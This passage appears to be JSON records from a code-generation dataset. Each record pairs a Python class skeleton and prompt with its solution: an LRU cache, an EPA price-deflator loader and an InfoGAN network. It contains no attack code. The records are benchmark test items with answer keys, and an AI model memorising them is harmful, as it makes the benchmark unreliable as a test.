\"cache\".\"\"\"\n self.__size = size\n self.__cache = OrderedDict()\n self.__label = label\n\n def get(self, key):\n \"\"\"Return the cached value associated with the input key. The key:value combination are moved to top of the cache. 
Args: key (hashable): identifier for cached object Returns: (any): Cached object associated with the input key or None\"\"\"\n try:\n value = self.__cache.pop(key)\n self.__cache[key] = value\n return value\n except KeyError:\n return None\n\n def set(self, key, value):\n \"\"\"Store the input value in the cache. The cache contents of the cache are adjusted if the size limit is exceeded. Args: key (hashable): identifier for cached object value (any): value to be cached Returns: bool: True for success or false otherwise\"\"\"\n try:\n try:\n self.__cache.pop(key)\n except KeyError:\n if len(self.__cache) >= self.__size:\n self.__cache.popitem(last=False)\n self.__cache[key] = value\n return True\n except Exception as e:\n logger.exception('Failing for %s with %s', self.__label, str(e))\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "rcsb/utils/io/CacheUtils.py", "source_repo": "rcsb/py-rcsb_utils_io", "split": "test", "star_events_count": 0} {"blob_id": "33795fb522e68ba325830305dc76aab9e4866567", "bodies": ["cache_key = calendar_year\nif cache_key not in ImplicitPriceDeflators._cache:\n calendar_years = pd.Series(ImplicitPriceDeflators._data.keys())\n if len(calendar_years[calendar_years <= calendar_year]) > 0:\n year = max(calendar_years[calendar_years <= calendar_year])\n ImplicitPriceDeflators._cache[cache_key] = ImplicitPriceDeflators._data[year]['price_deflator']\n else:\n raise Exception(f'Missing implicit price deflator for {calendar_year} or prior')\n if max(calendar_years[calendar_years <= calendar_year]) < calendar_year:\n raise Exception(f'Missing implicit price deflator for {calendar_year}')\nreturn ImplicitPriceDeflators._cache[cache_key]", "analysis_basis = omega_globals.options.analysis_dollar_basis\nadj_factor_numerator = ImplicitPriceDeflators.get_price_deflator(analysis_basis)\nadj_factor_denominator = ImplicitPriceDeflators.get_price_deflator(dollar_basis_input)\nadj_factor = adj_factor_numerator / adj_factor_denominator\nreturn adj_factor", "ImplicitPriceDeflators._data.clear()\nImplicitPriceDeflators._cache.clear()\nif verbose:\n omega_log.logwrite('\\nInitializing data from %s...' 
% filename)\ninput_template_name = 'context_implicit_price_deflators'\ninput_template_version = 0.22\ninput_template_columns = {'calendar_year', 'price_deflator'}\ntemplate_errors = validate_template_version_info(filename, input_template_name, input_template_version, verbose=verbose)\nif not template_errors:\n df = pd.read_csv(filename, skiprows=1)\n template_errors = validate_template_column_names(filename, input_template_columns, df.columns, verbose=verbose)\n if not template_errors:\n ImplicitPriceDeflators._data = df.set_index('calendar_year').to_dict(orient='index')\nreturn template_errors"], "bodies_text": "<|body_start_0|>\n cache_key = calendar_year\n if cache_key not in ImplicitPriceDeflators._cache:\n calendar_years = pd.Series(ImplicitPriceDeflators._data.keys())\n if len(calendar_years[calendar_years <= calendar_year]) > 0:\n year = max(calendar_years[calendar_years <= calendar_year])\n ImplicitPriceDeflators._cache[cache_key] = ImplicitPriceDeflators._data[year]['price_deflator']\n else:\n raise Exception(f'Missing implicit price deflator for {calendar_year} or prior')\n if max(calendar_years[calendar_years <= calendar_year]) < calendar_year:\n raise Exception(f'Missing implicit price deflator for {calendar_year}')\n return ImplicitPriceDeflators._cache[cache_key]\n<|end_body_0|>\n\n<|body_start_1|>\n analysis_basis = omega_globals.options.analysis_dollar_basis\n adj_factor_numerator = ImplicitPriceDeflators.get_price_deflator(analysis_basis)\n adj_factor_denominator = ImplicitPriceDeflators.get_price_deflator(dollar_basis_input)\n adj_factor = adj_factor_numerator / adj_factor_denominator\n return adj_factor\n<|end_body_1|>\n\n<|body_start_2|>\n ImplicitPriceDeflators._data.clear()\n ImplicitPriceDeflators._cache.clear()\n if verbose:\n omega_log.logwrite('\\nInitializing data from %s...' % filename)\n input_template_name = 'context_implicit_price_deflators'\n input_template_version = 0.22\n input_template_columns = {'calendar_year', 'price_deflator'}\n template_errors = validate_template_version_info(filename, input_template_name, input_template_version, verbose=verbose)\n if not template_errors:\n df = pd.read_csv(filename, skiprows=1)\n template_errors = validate_template_column_names(filename, input_template_columns, df.columns, verbose=verbose)\n if not template_errors:\n ImplicitPriceDeflators._data = df.set_index('calendar_year').to_dict(orient='index')\n return template_errors\n<|end_body_2|>\n", "class_docstring": "**Loads and provides access to implicit price deflators by calendar year.**", "class_name": "ImplicitPriceDeflators", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ImplicitPriceDeflators:\n \"\"\"**Loads and provides access to implicit price deflators by calendar year.**\"\"\"\n\n def get_price_deflator(calendar_year):\n \"\"\"Get the implicit price deflator for the given calendar year. Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.\"\"\"\n <|body_0|>\n\n def dollar_adjustment_factor(dollar_basis_input):\n \"\"\"Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.\"\"\"\n <|body_1|>\n\n def init_from_file(filename, verbose=False):\n \"\"\"Initialize class data from input file. 
Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cache_key = calendar_year\n if cache_key not in ImplicitPriceDeflators._cache:\n calendar_years = pd.Series(ImplicitPriceDeflators._data.keys())\n if len(calendar_years[calendar_years <= calendar_year]) > 0:\n year = max(calendar_years[calendar_years <= calendar_year])\n ImplicitPriceDeflators._cache[cache_key] = ImplicitPriceDeflators._data[year]['price_deflator']\n else:\n raise Exception(f'Missing implicit price deflator for {calendar_year} or prior')\n if max(calendar_years[calendar_years <= calendar_year]) < calendar_year:\n raise Exception(f'Missing implicit price deflator for {calendar_year}')\n return ImplicitPriceDeflators._cache[cache_key]\n<|end_body_0|>\n\n<|body_start_1|>\n analysis_basis = omega_globals.options.analysis_dollar_basis\n adj_factor_numerator = ImplicitPriceDeflators.get_price_deflator(analysis_basis)\n adj_factor_denominator = ImplicitPriceDeflators.get_price_deflator(dollar_basis_input)\n adj_factor = adj_factor_numerator / adj_factor_denominator\n return adj_factor\n<|end_body_1|>\n\n<|body_start_2|>\n ImplicitPriceDeflators._data.clear()\n ImplicitPriceDeflators._cache.clear()\n if verbose:\n omega_log.logwrite('\\nInitializing data from %s...' % filename)\n input_template_name = 'context_implicit_price_deflators'\n input_template_version = 0.22\n input_template_columns = {'calendar_year', 'price_deflator'}\n template_errors = validate_template_version_info(filename, input_template_name, input_template_version, verbose=verbose)\n if not template_errors:\n df = pd.read_csv(filename, skiprows=1)\n template_errors = validate_template_column_names(filename, input_template_columns, df.columns, verbose=verbose)\n if not template_errors:\n ImplicitPriceDeflators._data = df.set_index('calendar_year').to_dict(orient='index')\n return template_errors\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000184", "length_bytes": 5369, "license_type": "no_license", "methods": [{"docstring": "Get the implicit price deflator for the given calendar year. Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.", "name": "get_price_deflator", "signature": "def get_price_deflator(calendar_year)"}, {"docstring": "Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.", "name": "dollar_adjustment_factor", "signature": "def dollar_adjustment_factor(dollar_basis_input)"}, {"docstring": "Initialize class data from input file. Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success", "name": "init_from_file", "signature": "def init_from_file(filename, verbose=False)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007159", "prompt": "Implement the Python class `ImplicitPriceDeflators` described below.\n\nClass description:\n**Loads and provides access to implicit price deflators by calendar year.**\n\nMethod signatures and docstrings:\n- def get_price_deflator(calendar_year): Get the implicit price deflator for the given calendar year. 
Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.\n- def dollar_adjustment_factor(dollar_basis_input): Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.\n- def init_from_file(filename, verbose=False): Initialize class data from input file. Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success", "prompted_full_text": "Implement the Python class `ImplicitPriceDeflators` described below.\n\nClass description:\n**Loads and provides access to implicit price deflators by calendar year.**\n\nMethod signatures and docstrings:\n- def get_price_deflator(calendar_year): Get the implicit price deflator for the given calendar year. Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.\n- def dollar_adjustment_factor(dollar_basis_input): Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.\n- def init_from_file(filename, verbose=False): Initialize class data from input file. Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success\n\n<|skeleton|>\nclass ImplicitPriceDeflators:\n \"\"\"**Loads and provides access to implicit price deflators by calendar year.**\"\"\"\n\n def get_price_deflator(calendar_year):\n \"\"\"Get the implicit price deflator for the given calendar year. Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.\"\"\"\n <|body_0|>\n\n def dollar_adjustment_factor(dollar_basis_input):\n \"\"\"Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.\"\"\"\n <|body_1|>\n\n def init_from_file(filename, verbose=False):\n \"\"\"Initialize class data from input file. 
Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cache_key = calendar_year\n if cache_key not in ImplicitPriceDeflators._cache:\n calendar_years = pd.Series(ImplicitPriceDeflators._data.keys())\n if len(calendar_years[calendar_years <= calendar_year]) > 0:\n year = max(calendar_years[calendar_years <= calendar_year])\n ImplicitPriceDeflators._cache[cache_key] = ImplicitPriceDeflators._data[year]['price_deflator']\n else:\n raise Exception(f'Missing implicit price deflator for {calendar_year} or prior')\n if max(calendar_years[calendar_years <= calendar_year]) < calendar_year:\n raise Exception(f'Missing implicit price deflator for {calendar_year}')\n return ImplicitPriceDeflators._cache[cache_key]\n<|end_body_0|>\n\n<|body_start_1|>\n analysis_basis = omega_globals.options.analysis_dollar_basis\n adj_factor_numerator = ImplicitPriceDeflators.get_price_deflator(analysis_basis)\n adj_factor_denominator = ImplicitPriceDeflators.get_price_deflator(dollar_basis_input)\n adj_factor = adj_factor_numerator / adj_factor_denominator\n return adj_factor\n<|end_body_1|>\n\n<|body_start_2|>\n ImplicitPriceDeflators._data.clear()\n ImplicitPriceDeflators._cache.clear()\n if verbose:\n omega_log.logwrite('\\nInitializing data from %s...' % filename)\n input_template_name = 'context_implicit_price_deflators'\n input_template_version = 0.22\n input_template_columns = {'calendar_year', 'price_deflator'}\n template_errors = validate_template_version_info(filename, input_template_name, input_template_version, verbose=verbose)\n if not template_errors:\n df = pd.read_csv(filename, skiprows=1)\n template_errors = validate_template_column_names(filename, input_template_columns, df.columns, verbose=verbose)\n if not template_errors:\n ImplicitPriceDeflators._data = df.set_index('calendar_year').to_dict(orient='index')\n return template_errors\n<|end_body_2|>\n", "revision_id": "afe912c57383b9de90ef30820f7977c3367a30c4", "skeleton": "<|skeleton|>\nclass ImplicitPriceDeflators:\n \"\"\"**Loads and provides access to implicit price deflators by calendar year.**\"\"\"\n\n def get_price_deflator(calendar_year):\n \"\"\"Get the implicit price deflator for the given calendar year. Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.\"\"\"\n <|body_0|>\n\n def dollar_adjustment_factor(dollar_basis_input):\n \"\"\"Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.\"\"\"\n <|body_1|>\n\n def init_from_file(filename, verbose=False):\n \"\"\"Initialize class data from input file. Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ImplicitPriceDeflators:\n \"\"\"**Loads and provides access to implicit price deflators by calendar year.**\"\"\"\n\n def get_price_deflator(calendar_year):\n \"\"\"Get the implicit price deflator for the given calendar year. 
Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.\"\"\"\n cache_key = calendar_year\n if cache_key not in ImplicitPriceDeflators._cache:\n calendar_years = pd.Series(ImplicitPriceDeflators._data.keys())\n if len(calendar_years[calendar_years <= calendar_year]) > 0:\n year = max(calendar_years[calendar_years <= calendar_year])\n ImplicitPriceDeflators._cache[cache_key] = ImplicitPriceDeflators._data[year]['price_deflator']\n else:\n raise Exception(f'Missing implicit price deflator for {calendar_year} or prior')\n if max(calendar_years[calendar_years <= calendar_year]) < calendar_year:\n raise Exception(f'Missing implicit price deflator for {calendar_year}')\n return ImplicitPriceDeflators._cache[cache_key]\n\n def dollar_adjustment_factor(dollar_basis_input):\n \"\"\"Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.\"\"\"\n analysis_basis = omega_globals.options.analysis_dollar_basis\n adj_factor_numerator = ImplicitPriceDeflators.get_price_deflator(analysis_basis)\n adj_factor_denominator = ImplicitPriceDeflators.get_price_deflator(dollar_basis_input)\n adj_factor = adj_factor_numerator / adj_factor_denominator\n return adj_factor\n\n def init_from_file(filename, verbose=False):\n \"\"\"Initialize class data from input file. Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success\"\"\"\n ImplicitPriceDeflators._data.clear()\n ImplicitPriceDeflators._cache.clear()\n if verbose:\n omega_log.logwrite('\\nInitializing data from %s...' 
% filename)\n input_template_name = 'context_implicit_price_deflators'\n input_template_version = 0.22\n input_template_columns = {'calendar_year', 'price_deflator'}\n template_errors = validate_template_version_info(filename, input_template_name, input_template_version, verbose=verbose)\n if not template_errors:\n df = pd.read_csv(filename, skiprows=1)\n template_errors = validate_template_column_names(filename, input_template_columns, df.columns, verbose=verbose)\n if not template_errors:\n ImplicitPriceDeflators._data = df.set_index('calendar_year').to_dict(orient='index')\n return template_errors\n", "source": "the_stack_v2_python_sparse", "source_path": "omega_model/context/ip_deflators.py", "source_repo": "USEPA/EPA_OMEGA_Model", "split": "test", "star_events_count": 17} {"blob_id": "536df71401a84e09bfde81ec684ace3abfcdf8b1", "bodies": ["super().__init__()\nself.generator = generator_cls(latent_dim, n_classes, code_dim, img_size, num_channels)\nself.discriminator = discriminator_cls(code_dim, n_classes, num_channels, img_size)\nself._n_classes = n_classes\nself._latent_dim = latent_dim\nself._code_dim = code_dim\nself.lambda_cat = lambda_cat\nself.lambda_cont = lambda_cont\nself.generator.apply(weights_init_normal)\nself.discriminator.apply(weights_init_normal)", "if z is None:\n z = torch.randn(imgs.size(0), self._latent_dim, device=imgs.device, dtype=imgs.dtype)\nif labels is None:\n labels = torch.randint(self._n_classes, (imgs.size(0), 1), device=imgs.device, dtype=torch.long)\nif labels.size(-1) != self._n_classes:\n labels = one_hot_batch(labels.unsqueeze(1), num_classes=self._n_classes)\nif code is None:\n code = torch.empty(imgs.size(0), self._code_dim, device=imgs.device, dtype=imgs.dtype)\n code.uniform_(-1, 1)\ngen_imgs = self.generator(z, labels, code)\nvalidity_real, _, _ = self.discriminator(imgs)\nvalidity_fake, labels_fake, code_fake = self.discriminator(gen_imgs)\nreturn {'validity_real': validity_real, 'validity_fake': validity_fake, 'labels_real': labels, 'labels_fake': labels_fake, 'code_real': code, 'code_fake': code_fake, 'gen_imgs': gen_imgs}"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.generator = generator_cls(latent_dim, n_classes, code_dim, img_size, num_channels)\n self.discriminator = discriminator_cls(code_dim, n_classes, num_channels, img_size)\n self._n_classes = n_classes\n self._latent_dim = latent_dim\n self._code_dim = code_dim\n self.lambda_cat = lambda_cat\n self.lambda_cont = lambda_cont\n self.generator.apply(weights_init_normal)\n self.discriminator.apply(weights_init_normal)\n<|end_body_0|>\n\n<|body_start_1|>\n if z is None:\n z = torch.randn(imgs.size(0), self._latent_dim, device=imgs.device, dtype=imgs.dtype)\n if labels is None:\n labels = torch.randint(self._n_classes, (imgs.size(0), 1), device=imgs.device, dtype=torch.long)\n if labels.size(-1) != self._n_classes:\n labels = one_hot_batch(labels.unsqueeze(1), num_classes=self._n_classes)\n if code is None:\n code = torch.empty(imgs.size(0), self._code_dim, device=imgs.device, dtype=imgs.dtype)\n code.uniform_(-1, 1)\n gen_imgs = self.generator(z, labels, code)\n validity_real, _, _ = self.discriminator(imgs)\n validity_fake, labels_fake, code_fake = self.discriminator(gen_imgs)\n return {'validity_real': validity_real, 'validity_fake': validity_fake, 'labels_real': labels, 'labels_fake': labels_fake, 'code_real': code, 'code_fake': code_fake, 'gen_imgs': gen_imgs}\n<|end_body_1|>\n", "class_docstring": "Class implementing the Information Maximization Generative 
Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int", "class_name": "InfoGAN", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass InfoGAN:\n \"\"\"Class implementing the Information Maximization Generative Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int\"\"\"\n\n def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology\"\"\"\n <|body_0|>\n\n def forward(self, imgs, labels=None, z=None, code=None):\n \"\"\"Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.generator = generator_cls(latent_dim, n_classes, code_dim, img_size, num_channels)\n self.discriminator = discriminator_cls(code_dim, n_classes, num_channels, img_size)\n self._n_classes = n_classes\n self._latent_dim = latent_dim\n self._code_dim = code_dim\n self.lambda_cat = lambda_cat\n self.lambda_cont = lambda_cont\n self.generator.apply(weights_init_normal)\n self.discriminator.apply(weights_init_normal)\n<|end_body_0|>\n\n<|body_start_1|>\n if z is None:\n z = torch.randn(imgs.size(0), self._latent_dim, device=imgs.device, dtype=imgs.dtype)\n if labels is None:\n labels = torch.randint(self._n_classes, (imgs.size(0), 1), device=imgs.device, dtype=torch.long)\n if labels.size(-1) != 
self._n_classes:\n labels = one_hot_batch(labels.unsqueeze(1), num_classes=self._n_classes)\n if code is None:\n code = torch.empty(imgs.size(0), self._code_dim, device=imgs.device, dtype=imgs.dtype)\n code.uniform_(-1, 1)\n gen_imgs = self.generator(z, labels, code)\n validity_real, _, _ = self.discriminator(imgs)\n validity_fake, labels_fake, code_fake = self.discriminator(gen_imgs)\n return {'validity_real': validity_real, 'validity_fake': validity_fake, 'labels_real': labels, 'labels_fake': labels_fake, 'code_real': code, 'code_fake': code_fake, 'gen_imgs': gen_imgs}\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000185", "length_bytes": 6693, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology", "name": "__init__", "signature": "def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator)"}, {"docstring": "Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training", "name": "forward", "signature": "def forward(self, imgs, labels=None, z=None, code=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006029", "prompt": "Implement the Python class `InfoGAN` described below.\n\nClass description:\nClass implementing the Information Maximization Generative Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. 
If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int\n\nMethod signatures and docstrings:\n- def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator): Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology\n- def forward(self, imgs, labels=None, z=None, code=None): Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training", "prompted_full_text": "Implement the Python class `InfoGAN` described below.\n\nClass description:\nClass implementing the Information Maximization Generative Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. 
If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int\n\nMethod signatures and docstrings:\n- def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator): Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology\n- def forward(self, imgs, labels=None, z=None, code=None): Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training\n\n<|skeleton|>\nclass InfoGAN:\n \"\"\"Class implementing the Information Maximization Generative Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. 
If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int\"\"\"\n\n def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology\"\"\"\n <|body_0|>\n\n def forward(self, imgs, labels=None, z=None, code=None):\n \"\"\"Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.generator = generator_cls(latent_dim, n_classes, code_dim, img_size, num_channels)\n self.discriminator = discriminator_cls(code_dim, n_classes, num_channels, img_size)\n self._n_classes = n_classes\n self._latent_dim = latent_dim\n self._code_dim = code_dim\n self.lambda_cat = lambda_cat\n self.lambda_cont = lambda_cont\n self.generator.apply(weights_init_normal)\n self.discriminator.apply(weights_init_normal)\n<|end_body_0|>\n\n<|body_start_1|>\n if z is None:\n z = torch.randn(imgs.size(0), self._latent_dim, device=imgs.device, dtype=imgs.dtype)\n if labels is None:\n labels = torch.randint(self._n_classes, (imgs.size(0), 1), device=imgs.device, dtype=torch.long)\n if labels.size(-1) != self._n_classes:\n labels = one_hot_batch(labels.unsqueeze(1), num_classes=self._n_classes)\n if code is None:\n code = torch.empty(imgs.size(0), self._code_dim, device=imgs.device, dtype=imgs.dtype)\n code.uniform_(-1, 1)\n gen_imgs = self.generator(z, labels, code)\n validity_real, _, _ = self.discriminator(imgs)\n validity_fake, labels_fake, code_fake = self.discriminator(gen_imgs)\n return {'validity_real': validity_real, 'validity_fake': validity_fake, 'labels_real': labels, 'labels_fake': labels_fake, 'code_real': code, 'code_fake': code_fake, 'gen_imgs': gen_imgs}\n<|end_body_1|>\n", "revision_id": "1078f5030b8aac2bf022daf5fa14d66f74c3c893", "skeleton": "<|skeleton|>\nclass InfoGAN:\n \"\"\"Class implementing the Information Maximization Generative Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. 
If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int\"\"\"\n\n def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology\"\"\"\n <|body_0|>\n\n def forward(self, imgs, labels=None, z=None, code=None):\n \"\"\"Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class InfoGAN:\n \"\"\"Class implementing the Information Maximization Generative Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. 
If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int\"\"\"\n\n def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology\"\"\"\n super().__init__()\n self.generator = generator_cls(latent_dim, n_classes, code_dim, img_size, num_channels)\n self.discriminator = discriminator_cls(code_dim, n_classes, num_channels, img_size)\n self._n_classes = n_classes\n self._latent_dim = latent_dim\n self._code_dim = code_dim\n self.lambda_cat = lambda_cat\n 